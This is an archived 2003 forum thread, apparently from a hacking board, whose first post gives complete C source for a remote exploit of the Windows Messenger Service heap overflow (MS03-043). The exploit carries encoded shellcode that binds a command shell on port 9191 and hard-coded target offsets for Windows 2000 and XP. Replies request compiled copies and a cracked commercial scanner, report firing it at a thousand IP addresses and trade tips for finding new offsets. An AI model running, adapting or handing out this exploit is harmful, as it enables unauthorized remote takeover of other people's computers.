GaLiaRePt
Nov 15 2003, 10:15 AM
Microsoft Messenger Service Heap Overflow Exploit (MS03-043) Date: 2003-11-15 Author : Adik <netninja@hotmail.kg> Download : http://www.security-corporation.com/downlo...xploit/msgr07.c | CODE |
/ ********************************************************************************
****
Exploit for Microsoft Windows Messenger Heap Overflow (MS03-043)
based on PoC DoS by recca@mail.ru
by Adik < netmaniac [at] hotmail.kg >
http://netninja.to.kg
Binds command shell on port 9191
Tested on
Windows XP Professional SP1 English version
Windows 2000 Professional SP3 English version
access violation -> unhandledexceptionfilter ->
-> call [esi+48h]/call [edi+6ch] (win2kSP3/WinXPSP1) -> longjmp -> shellcode
attach debugger and c how it flows :) worked fine for me
-[25/Oct/2003]-
********************************************************************************
****/
#include <stdio.h>
#include <winsock.h>
#include <string.h>
#include <time.h>
#pragma comment(lib,"ws2_32")
#define VER "0.7"
/**************** bind shellcode spawns shell on port 9191 ************************/
unsigned char kyrgyz_bind_code[] = {
0xEB,0x03,0x5D,0xEB,0x05,0xE8,0xF8,0xFF,0xFF,0xFF,0x8B,0xC5,0x83,0xC0,0x11,0x33,
0xC9,0x66,0xB9,
0xC9,0x01,0x80,0x30,0x88,0x40,0xE2,0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAB, 0x6F, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};
int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH);
int main(int argc,char *argv[])
{
int sockUDP,ver,c, packetsz,cnt;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
WSADATA wsaData;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}/*,
{ //not tested
"Windows XP SP 0 (en)",
0x77ed63b4,
0x7802ff3d //rpcrt4 call [edi+6c]
}*/
};
printf("\n-=[ MS Messenger Service Heap Overflow Exploit (MS03-043) ver %s ]=-\n\n"
" by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);
if(argc < 3)
{
printf(" Target OS version:\n\n");
for(c=0;c<(sizeof(targetOS)/sizeof(targetOS[0]));c++)
printf(" [%d]\t%s\n",c,targetOS[c].os);
printf("\n Usage: %s [TargetIP] [ver: 0 | 1]\n"
" eg: msgr.exe 192.168.63.130 0\n",argv[0]);
return 1;
}
ver = atoi(argv[2]);
printf("[*] Target: \t IP: %s\t OS: %s\n"
"[*] UEF: \t 0x%x\n"
"[*] JMP: \t 0x%x\n\n", argv[1],targetOS[ver].os, targetOS[ver].SEH, targetOS[ver].JMP);
WSAStartup(0x0202, &wsaData);
printf("[*] WSAStartup initialized...\n");
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = inet_addr(argv[1]);
targetUDP.sin_port = htons(135);
packetsz = PreparePacket(packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
printf("[x] Socket not initialized! Exiting...\n");
return 1;
}
printf("[*] Socket initialized...\n");
printf("[*] Injecting packet into a remote process...\n");
if (sendto(sockUDP, packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
printf("[x] Failed to inject packet! Exiting...\n");
return 1;
}
else
printf("[*] Packet injected...\n");
printf("[i] Try connecting to %s:9191\n\n",argv[1]);
return 0;
}
/ ********************************************************************************
****/
int PreparePacket(char *packet,int sizeofpacket, DWORD Jmp, DWORD SEH)
{
static unsigned char packet_header[] =
"\x04\x00\x28\x00"
"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xf8\x91\x7b\x5a\x00\xff\xd0\x11\xa9\xb2\x00\xc0"
"\x4f\xb6\xe6\xfc\xff\xff\xff\xff\x42\x69\x73\x68\x6b\x65\x6b\x32"
"\x30\x30\x33\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00";
unsigned char field_header[] = "\xff\xff\xff\xff\x00\x00\x00\x00"
"\xff\xff\xff\xff";
int packet_size,i,fields_size;
char from[] = "NETMANIAC";
char machine[] = "ADIK";
char longjmp[] ="\x90\x90\x90\x90\x90"
"\xEB\x03\x58\xEB\x05\xE8\xF8\xFF\xFF\xFF"
"\xB9\xFF\xFF\xFF\xFF\x81\xE9\x7F\xEE\xFF"
"\xFF\x2B\xC1\xFF\xE0";
char shortjmp[] ="\x90\x90\x90\x90\xEB\x10\x90\x90\x90\x90\x90\x90";
char body[5000] = "*** MESSAGE ***";//4096
ZeroMemory(packet, sizeofpacket);
packet_size = 0;
memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
packet_size += sizeof(packet_header) - 1;
i = strlen(from) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], from);
packet_size += (((i - 1) >> 2) + 1) << 2;
i = strlen(machine) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], machine);
packet_size += (((i - 1) >> 2) + 1) << 2;
memset(body, 0x90, 2296);
memcpy(&body[500],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
memset(&body[2296],0x14,1800);
memcpy(&body[2296+1110],shortjmp,sizeof(shortjmp));
*(DWORD *)&body[2296+1121] = Jmp;
*(DWORD *)&body[2296+1125] = SEH;
memcpy(&body[2296+1129],longjmp,sizeof(longjmp)-1);
fprintf(stdout, "[*] Msg body size: %d\n",
3656 - packet_size + sizeof(packet_header) - sizeof(field_header));
body[3656 - packet_size + sizeof(packet_header) - sizeof(field_header) - 1] = '\0';
i = strlen(body) + 1;
*(unsigned int *)(&field_header[0]) = i;
*(unsigned int *)(&field_header[8]) = i;
memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
packet_size += sizeof(field_header) - 1;
strcpy(&packet[packet_size], body);
packet_size += i;
fields_size = packet_size - (sizeof(packet_header) - 1);
*(unsigned int *)(&packet[40]) = time(NULL);
*(unsigned int *)(&packet[74]) = fields_size;
return packet_size;
}
/ ********************************************************************************
****/ |
gordan wells
Nov 15 2003, 10:20 AM
ok, this looks nice,
can anyone compile this?
and does their exist a scanner for this? maybe the retina scanner, but its a #day trial, so maybe can someone post the crack.. or another appropriate scanner for this vulnerability?
greetings
neb
Nov 15 2003, 10:44 AM
It's great exploit ... i try it  THX | QUOTE | and does their exist a scanner for this? maybe the retina scanner, but its a #day trial, so maybe can someone post the crack.. or another appropriate scanner for this vulnerability?
|
It's not Warez board here ..... and what else do u want a Blowj** and a coffee with this ???
ducky
Nov 15 2003, 11:34 AM
very nice one mate..thanQ... ps-neb,like the b***job and coffee line  edit : i was wondering...is this Vuln. is Port 135 ? or what port is it? and my firewall should help me not to get that stuff to f*** up my Pc right?
BSDG33K
Nov 15 2003, 12:55 PM
it look's nice, but.. why the exploits posted here are all them for windows? errr  if anybody knows where i can get a unix ported version, is welcome
pr0t0type
Nov 15 2003, 01:48 PM
thanks man, i'll give thisa go.
Theres a free retina scanner for the messenger exploit on their site.
Basti
Nov 15 2003, 02:16 PM
Which site ?
gordan wells
Nov 15 2003, 02:54 PM
| QUOTE | | It's not Warez board here ..... and what else do u want a Blowj** and a coffee with this ??? |
coffee would be nice hehe 
tareq
Nov 15 2003, 04:29 PM
thanks i'll compile it & check
Dillinja
Nov 15 2003, 04:50 PM
Next person who asks for a compile...is banned. If you cant compile, how do you know what the script does? Because someone told you? Cop yourself on.
TheStinger
Nov 15 2003, 04:54 PM
:\ tested on 1000 ips, without successful 
gordan wells
Nov 15 2003, 05:08 PM
isnt this the same (MS03-043) as wicked posted?, and that was an 'old' exploit here
chris105
Nov 15 2003, 07:58 PM
he he i love it when they ask for a comile, lol
tribalgoa
Nov 16 2003, 12:56 AM
please let everyone who doesnt have a clue ask for a compile so at least we're rid of them ) thanks for the nice post man ... this is a dangerous one !
yuliang11
Nov 17 2003, 01:46 AM
dude.. the code only works after some slight modification. anyway now still trying to find any pc with those exact service pack.is there a way that we can code it to become a universal offset? any exploits coding gurus would help me on that? or at least give me a hint how to write those? anyway thanks a lot for the code 
GhostCow
Nov 17 2003, 07:59 AM
vuliang, if you say the script can work with slight modifications then even if there's no universal offset (which you can btw check with people who dealt with the early RPC exploits) can you please post it?
thanks!
tribalgoa
Nov 17 2003, 11:12 PM
yeah please post a modified version coz i tested this one on w2k sp3 and it didnt do anything (not even crash)
yuliang11
Nov 18 2003, 01:08 AM
uhh huh..need a lot of time doing research,  .....anyway i am new to exploit programming,that's why i need help from pros out there 
n4than_69
Nov 18 2003, 02:47 AM
does anyone know if this works on 2000 SP2?
nmcog
Nov 29 2003, 11:01 PM
| CODE |
targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
|
Is it possible to find out the values for Win2k SP4 (en)? If so, how?
Fisker
Nov 30 2003, 10:50 AM
My best guess would be debuging, but i dunno
123spawnie123
Dec 1 2003, 07:23 AM
i tried this vulnerability on my testbox worked fine, however you seem to have to restart the comp if you like to do something with it again at least i did so if it's that way on all comp it's not really a hack that would go unnoticed, aslo the shell is persistent  and then there's the matter as to how to scan for this as you need to know the os and sp ...
cyrixx
Dec 1 2003, 12:38 PM
hhhm, use RpcScan to find out the os and sp
--Elite--
Dec 1 2003, 01:01 PM
any1 has a 2k-SP4 address-included code ? i would thnx him/her to share it with me.
what
Dec 1 2003, 01:24 PM
if you want to find the offset (at least for the RPC exploit) then you need dbg, which comes with linux, or Ollydbg, which is for windows. Open up services.exe and go to Executable Modules, the exploitable .dll, and then JMP ESP
nmcog
Dec 2 2003, 03:55 AM
| QUOTE (cyrixx @ Dec 1 2003, 12:38 PM) | hhhm, use RpcScan to find out the os and sp
|
I tried RpcScan, what should I be looking for in the output to determine the OS version and ServicePack installed?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
|
